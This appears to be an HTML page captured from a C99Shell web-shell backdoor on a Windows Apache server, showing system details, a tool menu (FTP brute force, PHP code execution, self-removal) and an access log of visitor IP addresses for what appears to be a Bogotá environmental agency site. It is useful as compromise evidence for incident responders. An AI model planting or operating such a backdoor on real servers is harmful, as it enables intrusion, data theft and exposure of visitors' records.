!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\nuevo\apache\logs\   drwxrwxrwx
Free 7.33 GB of 239.26 GB (3.07%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     access.2023.03.18.log (922.12 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
192.168.175.240 - - [18/Mar/2023:00:00:45 -0500] "GET / HTTP/1.1" 200 4720
66.249.79.115 - - [18/Mar/2023:00:01:11 -0500] "GET /galeria/nivo-slider/demo/images/bannerrutaesperanza.jpg HTTP/1.1" 200 55560
192.168.175.240 - - [18/Mar/2023:00:01:45 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [18/Mar/2023:00:01:50 -0500] "GET /BLA/boletinlegal/owa/auth/x.js HTTP/1.1" 404 1018
186.84.22.1 - - [18/Mar/2023:00:01:54 -0500] "-" 408 -
172.22.2.4 - - [18/Mar/2023:00:01:02 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
192.168.175.240 - - [18/Mar/2023:00:02:45 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [18/Mar/2023:00:03:26 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42239
172.22.2.4 - - [18/Mar/2023:00:01:52 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53104
216.245.221.92 - - [18/Mar/2023:00:03:43 -0500] "HEAD / HTTP/1.1" 200 -
192.168.175.240 - - [18/Mar/2023:00:03:45 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [18/Mar/2023:00:04:45 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [18/Mar/2023:00:05:45 -0500] "GET / HTTP/1.1" 200 4720
168.119.253.13 - - [18/Mar/2023:00:06:00 -0500] "GET / HTTP/1.1" 200 4720
168.119.253.13 - - [18/Mar/2023:00:06:02 -0500] "GET / HTTP/1.1" 200 319
66.249.70.188 - - [18/Mar/2023:00:06:29 -0500] "-" 408 -
192.168.175.240 - - [18/Mar/2023:00:06:45 -0500] "GET / HTTP/1.1" 200 4720
52.167.144.142 - - [18/Mar/2023:00:07:29 -0500] "GET /BLA/resoluciones/AUTOS%202021/2082.pdf HTTP/1.1" 304 -
66.249.79.115 - - [18/Mar/2023:00:07:37 -0500] "GET /galeria/nivo-slider/demo/images/bannertrafico_optimized.jpg HTTP/1.1" 200 42578
192.168.175.240 - - [18/Mar/2023:00:07:45 -0500] "GET / HTTP/1.1" 200 4720
152.61.192.232 - - [18/Mar/2023:00:07:58 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [18/Mar/2023:00:08:25 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42239
172.22.2.4 - - [18/Mar/2023:00:06:52 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [18/Mar/2023:00:08:43 -0500] "HEAD / HTTP/1.1" 200 -
192.168.175.240 - - [18/Mar/2023:00:08:45 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [18/Mar/2023:00:07:42 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58297
192.168.175.240 - - [18/Mar/2023:00:09:45 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [18/Mar/2023:00:10:45 -0500] "GET / HTTP/1.1" 200 4720
64.124.8.36 - - [18/Mar/2023:00:11:02 -0500] "GET /BLA/boletinlegal/normativa.php HTTP/1.1" 200 8333
74.125.213.54 - - [18/Mar/2023:00:11:18 -0500] "GET /images/jardines-verticales_optimized.jpeg HTTP/1.1" 200 138197
64.124.8.36 - - [18/Mar/2023:00:11:18 -0500] "GET /BLA/boletinlegal/jurisprudencia.php HTTP/1.1" 200 17573
64.124.8.56 - - [18/Mar/2023:00:11:30 -0500] "-" 408 -
192.168.175.240 - - [18/Mar/2023:00:11:45 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [18/Mar/2023:00:12:45 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [18/Mar/2023:00:13:25 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42239
216.245.221.92 - - [18/Mar/2023:00:13:43 -0500] "HEAD / HTTP/1.1" 200 -
192.168.175.240 - - [18/Mar/2023:00:13:45 -0500] "GET / HTTP/1.1" 200 4720
64.124.8.56 - - [18/Mar/2023:00:13:49 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/G__Jurisp.%20Junio%202014_JURISPRUDENIA%2005-10-213%20CERROS%20BOGOTA.docx HTTP/1.1" 404 1018
199.16.157.183 - - [18/Mar/2023:00:14:01 -0500] "GET /images/foto%202.jpg HTTP/1.1" 200 63300
66.249.79.113 - - [18/Mar/2023:00:14:03 -0500] "GET /galeria/nivo-slider/demo/images/bannertortuga_optimized.jpg HTTP/1.1" 200 39066
172.22.2.4 - - [18/Mar/2023:00:12:42 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
192.168.175.240 - - [18/Mar/2023:00:14:45 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [18/Mar/2023:00:13:33 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
192.168.175.240 - - [18/Mar/2023:00:15:45 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [18/Mar/2023:00:16:45 -0500] "GET / HTTP/1.1" 200 4720
31.13.127.21 - - [18/Mar/2023:00:17:05 -0500] "GET /images/Humedal%20Tunjo%20RAMSAR.jpeg HTTP/1.1" 200 120269
31.13.127.120 - - [18/Mar/2023:00:17:05 -0500] "GET /images/Juan%20Rey%20febrero%2013.jpg HTTP/1.1" 200 55934
192.168.175.240 - - [18/Mar/2023:00:17:45 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [18/Mar/2023:00:18:26 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42239
216.245.221.92 - - [18/Mar/2023:00:18:43 -0500] "HEAD / HTTP/1.1" 200 -
192.168.175.240 - - [18/Mar/2023:00:18:45 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [18/Mar/2023:00:19:45 -0500] "GET / HTTP/1.1" 200 4720
66.249.70.180 - - [18/Mar/2023:00:19:47 -0500] "-" 408 -
172.22.2.4 - - [18/Mar/2023:00:18:32 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.79.113 - - [18/Mar/2023:00:20:28 -0500] "GET /galeria/nivo-slider/demo/images/Bannersedeelectronica.jpg HTTP/1.1" 200 40383
192.168.175.240 - - [18/Mar/2023:00:20:45 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [18/Mar/2023:00:20:45 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42070
201.245.192.253 - - [18/Mar/2023:00:20:49 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43483
172.22.2.4 - - [18/Mar/2023:00:19:22 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
64.124.8.56 - - [18/Mar/2023:00:21:35 -0500] "-" 408 -
192.168.175.240 - - [18/Mar/2023:00:21:45 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [18/Mar/2023:00:22:45 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [18/Mar/2023:00:23:25 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42239
201.221.172.6 - - [18/Mar/2023:00:23:43 -0500] "GET /mujeres-que-reverdecen-secretaria-de-ambiente-anuncia-el-inicio-de-la-tercera-fase.html HTTP/1.1" 304 -
216.245.221.92 - - [18/Mar/2023:00:23:43 -0500] "HEAD / HTTP/1.1" 200 -
192.168.175.240 - - [18/Mar/2023:00:23:45 -0500] "GET / HTTP/1.1" 200 4720
152.61.128.50 - - [18/Mar/2023:00:24:38 -0500] "GET / HTTP/1.1" 200 319
192.168.175.240 - - [18/Mar/2023:00:24:45 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [18/Mar/2023:00:25:45 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [18/Mar/2023:00:24:22 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
52.167.144.71 - - [18/Mar/2023:00:26:32 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/2903.pdf HTTP/1.1" 200 474460
192.168.175.240 - - [18/Mar/2023:00:26:45 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [18/Mar/2023:00:25:12 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52316
181.61.116.221 - - [18/Mar/2023:00:27:06 -0500] "GET /mujeres-que-reverdecen-secretaria-de-ambiente-anuncia-el-inicio-de-la-tercera-fase.html HTTP/1.1" 304 -
192.168.175.240 - - [18/Mar/2023:00:27:45 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [18/Mar/2023:00:28:25 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42239
181.56.235.113 - - [18/Mar/2023:00:28:36 -0500] "GET /BLA/resoluciones/index.php HTTP/1.1" 200 13502
181.56.235.113 - - [18/Mar/2023:00:28:38 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2014%2F HTTP/1.1" 200 887591
216.245.221.92 - - [18/Mar/2023:00:28:43 -0500] "HEAD / HTTP/1.1" 200 -
192.168.175.240 - - [18/Mar/2023:00:28:45 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [18/Mar/2023:00:28:26 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 49099
192.168.175.240 - - [18/Mar/2023:00:29:45 -0500] "GET / HTTP/1.1" 200 4720
181.53.12.144 - - [18/Mar/2023:00:30:11 -0500] "-" 408 -
192.168.175.240 - - [18/Mar/2023:00:30:45 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [18/Mar/2023:00:30:46 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42070
201.245.192.253 - - [18/Mar/2023:00:30:48 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43483
52.167.144.160 - - [18/Mar/2023:00:31:44 -0500] "GET /BLA/resoluciones/AUTOS%202022/1283.pdf HTTP/1.1" 200 377435
192.168.175.240 - - [18/Mar/2023:00:31:45 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [18/Mar/2023:00:30:12 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
52.167.144.71 - - [18/Mar/2023:00:32:03 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 12490
172.22.2.4 - - [18/Mar/2023:00:31:02 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56744
192.168.175.240 - - [18/Mar/2023:00:32:45 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [18/Mar/2023:00:33:23 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42239
216.245.221.92 - - [18/Mar/2023:00:33:43 -0500] "HEAD / HTTP/1.1" 200 -
192.168.175.240 - - [18/Mar/2023:00:33:45 -0500] "GET / HTTP/1.1" 200 4720
64.124.8.56 - - [18/Mar/2023:00:34:01 -0500] "-" 408 -
192.168.175.240 - - [18/Mar/2023:00:34:45 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [18/Mar/2023:00:35:45 -0500] "GET / HTTP/1.1" 200 4720
52.167.144.142 - - [18/Mar/2023:00:36:02 -0500] "GET /BLA/resoluciones/AUTOS%202021/2606.pdf HTTP/1.1" 304 -
192.168.175.240 - - [18/Mar/2023:00:36:45 -0500] "GET / HTTP/1.1" 200 4720
64.124.8.39 - - [18/Mar/2023:00:37:35 -0500] "-" 408 -
172.22.2.4 - - [18/Mar/2023:00:36:02 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
192.168.175.240 - - [18/Mar/2023:00:37:45 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [18/Mar/2023:00:38:23 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42239
172.22.2.4 - - [18/Mar/2023:00:36:52 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57141
216.245.221.92 - - [18/Mar/2023:00:38:43 -0500] "HEAD / HTTP/1.1" 200 -
192.168.175.240 - - [18/Mar/2023:00:38:45 -0500] "GET / HTTP/1.1" 200 4720
64.124.8.39 - - [18/Mar/2023:00:38:52 -0500] "-" 408 -
192.168.175.240 - - [18/Mar/2023:00:39:45 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [18/Mar/2023:00:40:45 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [18/Mar/2023:00:40:45 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42070
201.245.192.253 - - [18/Mar/2023:00:40:48 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43483
192.168.175.240 - - [18/Mar/2023:00:41:45 -0500] "GET / HTTP/1.1" 200 4720
191.156.187.196 - - [18/Mar/2023:00:42:37 -0500] "GET /images/jardines-verticales_optimized.jpeg HTTP/1.1" 200 138197
192.168.175.240 - - [18/Mar/2023:00:42:45 -0500] "GET / HTTP/1.1" 200 4720
168.119.253.6 - - [18/Mar/2023:00:43:04 -0500] "GET / HTTP/1.1" 200 319
168.119.253.6 - - [18/Mar/2023:00:43:04 -0500] "GET / HTTP/1.1" 200 4720
191.156.176.54 - - [18/Mar/2023:00:43:09 -0500] "GET /%C3%82%C2%BFquieres-aprender-sobre-jardines-verticales-esta-es-tu-oportunidad.html HTTP/1.1" 200 925
201.245.192.253 - - [18/Mar/2023:00:43:22 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42239
172.22.2.4 - - [18/Mar/2023:00:41:52 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [18/Mar/2023:00:43:43 -0500] "HEAD / HTTP/1.1" 200 -
192.168.175.240 - - [18/Mar/2023:00:43:45 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [18/Mar/2023:00:42:42 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
192.168.175.240 - - [18/Mar/2023:00:44:45 -0500] "GET / HTTP/1.1" 200 4720
191.156.187.196 - - [18/Mar/2023:00:45:11 -0500] "GET /images/jardines-verticales_optimized.jpeg HTTP/1.1" 200 138197
192.168.175.240 - - [18/Mar/2023:00:45:45 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [18/Mar/2023:00:46:45 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [18/Mar/2023:00:47:45 -0500] "GET / HTTP/1.1" 200 4720
191.156.190.88 - - [18/Mar/2023:00:47:49 -0500] "GET / HTTP/1.1" 200 4720
191.156.190.88 - - [18/Mar/2023:00:47:49 -0500] "GET /js/url.js HTTP/1.1" 404 1294
191.156.187.183 - - [18/Mar/2023:00:47:49 -0500] "GET /fonts/icomoon/style.css HTTP/1.1" 200 79820
191.156.187.196 - - [18/Mar/2023:00:47:49 -0500] "GET /css/bootstrap.min.css HTTP/1.1" 200 178212
191.156.190.88 - - [18/Mar/2023:00:47:49 -0500] "GET /css/style.css HTTP/1.1" 200 3473
191.156.187.196 - - [18/Mar/2023:00:47:49 -0500] "GET /favicon.ico HTTP/1.1" 404 1294
172.22.2.4 - - [18/Mar/2023:00:47:55 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/CUADRO%20ANALISIS%20SENTENCIA%20T-411%20DE%201992.doc HTTP/1.1" 200 41984
201.245.192.253 - - [18/Mar/2023:00:48:21 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42239
216.245.221.92 - - [18/Mar/2023:00:48:43 -0500] "HEAD / HTTP/1.1" 200 -
192.168.175.240 - - [18/Mar/2023:00:48:45 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [18/Mar/2023:00:47:42 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
192.168.175.240 - - [18/Mar/2023:00:49:45 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [18/Mar/2023:00:48:32 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59296
152.61.192.232 - - [18/Mar/2023:00:50:34 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?request=GetCapabilities&service=WMS HTTP/1.1" 503 1020
152.61.192.232 - - [18/Mar/2023:00:50:35 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?SERVICE=WMS&REQUEST=GetCapabilities HTTP/1.1" 503 1020
152.61.192.232 - - [18/Mar/2023:00:50:35 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?WMTVER=1.0.0&REQUEST=capabilities HTTP/1.1" 503 1020
192.168.175.240 - - [18/Mar/2023:00:50:45 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [18/Mar/2023:00:51:45 -0500] "GET / HTTP/1.1" 200 4720
66.249.70.182 - - [18/Mar/2023:00:52:11 -0500] "-" 408 -
192.168.175.240 - - [18/Mar/2023:00:52:45 -0500] "GET / HTTP/1.1" 200 4720
177.130.242.99 - - [18/Mar/2023:00:53:04 -0500] "-" 408 -
201.245.192.253 - - [18/Mar/2023:00:53:20 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42239
216.245.221.92 - - [18/Mar/2023:00:53:43 -0500] "HEAD / HTTP/1.1" 200 -
192.168.175.240 - - [18/Mar/2023:00:53:45 -0500] "GET / HTTP/1.1" 200 4720
157.55.39.206 - - [18/Mar/2023:00:54:37 -0500] "GET /mujeres-que-reverdecen-secretaria-de-ambiente-anuncia-el-inicio-de-la-tercera-fase.html HTTP/1.1" 200 954
192.168.175.240 - - [18/Mar/2023:00:54:45 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [18/Mar/2023:00:53:32 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
192.168.175.240 - - [18/Mar/2023:00:55:45 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [18/Mar/2023:00:54:22 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55561
192.168.175.240 - - [18/Mar/2023:00:56:45 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [18/Mar/2023:00:57:45 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [18/Mar/2023:00:58:19 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42239
216.245.221.92 - - [18/Mar/2023:00:58:43 -0500] "HEAD / HTTP/1.1" 200 -
192.168.175.240 - - [18/Mar/2023:00:58:45 -0500] "GET / HTTP/1.1" 200 4720
66.249.70.180 - - [18/Mar/2023:00:58:52 -0500] "-" 408 -
192.168.175.240 - - [18/Mar/2023:00:59:45 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [18/Mar/2023:01:00:45 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [18/Mar/2023:00:59:22 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
64.124.8.56 - - [18/Mar/2023:01:01:04 -0500] "-" 408 -
172.22.2.4 - - [18/Mar/2023:01:01:07 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/Analisis%20Sentencia%20T-1077,%202%20corregida.doc HTTP/1.1" 200 47616
52.167.144.160 - - [18/Mar/2023:01:01:18 -0500] "GET /appsia/controlador HTTP/1.1" 200 4799
173.252.79.4 - - [18/Mar/2023:01:01:26 -0500] "GET /images/foto%202.jpg HTTP/1.1" 200 63300
52.167.144.149 - - [18/Mar/2023:01:01:31 -0500] "GET /appsia/scripts/validarIngreso.js HTTP/1.1" 200 851
52.167.144.167 - - [18/Mar/2023:01:01:35 -0500] "GET /appsia/css/estilos.css HTTP/1.1" 200 4804
192.168.175.240 - - [18/Mar/2023:01:01:45 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [18/Mar/2023:01:00:12 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57141
192.168.175.240 - - [18/Mar/2023:01:02:45 -0500] "GET / HTTP/1.1" 200 4720
69.63.184.120 - - [18/Mar/2023:01:02:51 -0500] "GET /mujeres-que-reverdecen-bogota-intercambian-saberes-y-semillas.html HTTP/1.1" 206 880
201.245.192.253 - - [18/Mar/2023:01:03:18 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42239
172.22.2.4 - - [18/Mar/2023:01:03:26 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1134
216.245.221.92 - - [18/Mar/2023:01:03:43 -0500] "HEAD / HTTP/1.1" 200 -
192.168.175.240 - - [18/Mar/2023:01:03:45 -0500] "GET / HTTP/1.1" 200 4720
64.124.8.36 - - [18/Mar/2023:01:04:33 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/G__Jurisp.%20Junio%202014_ANALISIS%20JURISPRUDENCIA%20C-634-12%20DECOMISO.docx HTTP/1.1" 200 27045
192.168.175.240 - - [18/Mar/2023:01:04:45 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [18/Mar/2023:01:03:26 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 62202
192.168.175.240 - - [18/Mar/2023:01:05:45 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [18/Mar/2023:01:06:45 -0500] "GET / HTTP/1.1" 200 4720
34.91.202.142 - - [18/Mar/2023:01:06:52 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
172.22.2.4 - - [18/Mar/2023:01:05:12 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [18/Mar/2023:01:06:02 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53551
192.168.175.240 - - [18/Mar/2023:01:07:45 -0500] "GET / HTTP/1.1" 200 4720
66.249.70.180 - - [18/Mar/2023:01:08:12 -0500] "-" 408 -
201.245.192.253 - - [18/Mar/2023:01:08:17 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42239
216.245.221.92 - - [18/Mar/2023:01:08:43 -0500] "HEAD / HTTP/1.1" 200 -
192.168.175.240 - - [18/Mar/2023:01:08:45 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [18/Mar/2023:01:09:45 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [18/Mar/2023:01:10:45 -0500] "GET / HTTP/1.1" 200 4720
114.119.151.17 - - [18/Mar/2023:01:10:50 -0500] "-" 408 -
192.168.175.240 - - [18/Mar/2023:01:11:45 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [18/Mar/2023:01:11:02 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
192.168.175.240 - - [18/Mar/2023:01:12:45 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [18/Mar/2023:01:13:14 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42239
172.22.2.4 - - [18/Mar/2023:01:11:52 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55924
64.124.8.39 - - [18/Mar/2023:01:13:37 -0500] "-" 408 -
216.245.221.92 - - [18/Mar/2023:01:13:43 -0500] "HEAD / HTTP/1.1" 200 -
192.168.175.240 - - [18/Mar/2023:01:13:45 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [18/Mar/2023:01:14:45 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [18/Mar/2023:01:15:45 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [18/Mar/2023:01:16:45 -0500] "GET / HTTP/1.1" 200 4720
152.61.128.50 - - [18/Mar/2023:01:16:46 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?request=GetCapabilities&service=WMS HTTP/1.1" 503 1020
152.61.128.50 - - [18/Mar/2023:01:16:47 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?SERVICE=WMS&REQUEST=GetCapabilities HTTP/1.1" 503 1020
152.61.128.50 - - [18/Mar/2023:01:16:48 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?WMTVER=1.0.0&REQUEST=capabilities HTTP/1.1" 503 1020
136.243.79.224 - - [18/Mar/2023:01:17:09 -0500] "GET /palmas-silvestres-secretaria-de-ambiente-inicia-campana-de-proteccion.html HTTP/1.1" 206 851
116.202.35.124 - - [18/Mar/2023:01:17:30 -0500] "GET /palmas-silvestres-secretaria-de-ambiente-inicia-campana-de-proteccion.html HTTP/1.1" 200 851
192.168.175.240 - - [18/Mar/2023:01:17:45 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [18/Mar/2023:01:18:11 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42239
172.22.2.4 - - [18/Mar/2023:01:16:52 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
64.124.8.39 - - [18/Mar/2023:01:18:34 -0500] "-" 408 -
216.245.221.92 - - [18/Mar/2023:01:18:43 -0500] "HEAD / HTTP/1.1" 200 -
192.168.175.240 - - [18/Mar/2023:01:18:45 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [18/Mar/2023:01:17:42 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58653
192.168.175.240 - - [18/Mar/2023:01:19:45 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [18/Mar/2023:01:20:45 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [18/Mar/2023:01:20:45 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41436
201.245.192.253 - - [18/Mar/2023:01:20:48 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43337
192.168.175.240 - - [18/Mar/2023:01:21:45 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [18/Mar/2023:01:21:39 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 28619
192.168.175.240 - - [18/Mar/2023:01:22:45 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [18/Mar/2023:01:23:10 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42239
216.245.221.92 - - [18/Mar/2023:01:23:43 -0500] "HEAD / HTTP/1.1" 200 -
192.168.175.240 - - [18/Mar/2023:01:23:45 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [18/Mar/2023:01:22:42 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
192.168.175.240 - - [18/Mar/2023:01:24:45 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [18/Mar/2023:01:23:32 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58653
192.168.175.240 - - [18/Mar/2023:01:25:45 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [18/Mar/2023:01:26:45 -0500] "GET / HTTP/1.1" 200 4720
154.89.5.38 - - [18/Mar/2023:01:26:50 -0500] "GET / HTTP/1.1" 200 319
154.89.5.38 - - [18/Mar/2023:01:26:50 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
64.124.8.39 - - [18/Mar/2023:01:26:51 -0500] "-" 408 -
192.168.175.240 - - [18/Mar/2023:01:27:45 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [18/Mar/2023:01:28:11 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42239
216.245.221.92 - - [18/Mar/2023:01:28:43 -0500] "HEAD / HTTP/1.1" 200 -
192.168.175.240 - - [18/Mar/2023:01:28:45 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [18/Mar/2023:01:29:45 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [18/Mar/2023:01:28:32 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
192.168.175.240 - - [18/Mar/2023:01:30:45 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [18/Mar/2023:01:30:46 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41436
201.245.192.253 - - [18/Mar/2023:01:30:48 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43337
172.22.2.4 - - [18/Mar/2023:01:29:22 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57141
192.168.175.240 - - [18/Mar/2023:01:31:45 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [18/Mar/2023:01:32:45 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [18/Mar/2023:01:33:09 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42239
216.245.221.92 - - [18/Mar/2023:01:33:43 -0500] "HEAD / HTTP/1.1" 200 -
192.168.175.240 - - [18/Mar/2023:01:33:45 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [18/Mar/2023:01:34:45 -0500] "GET / HTTP/1.1" 200 4720
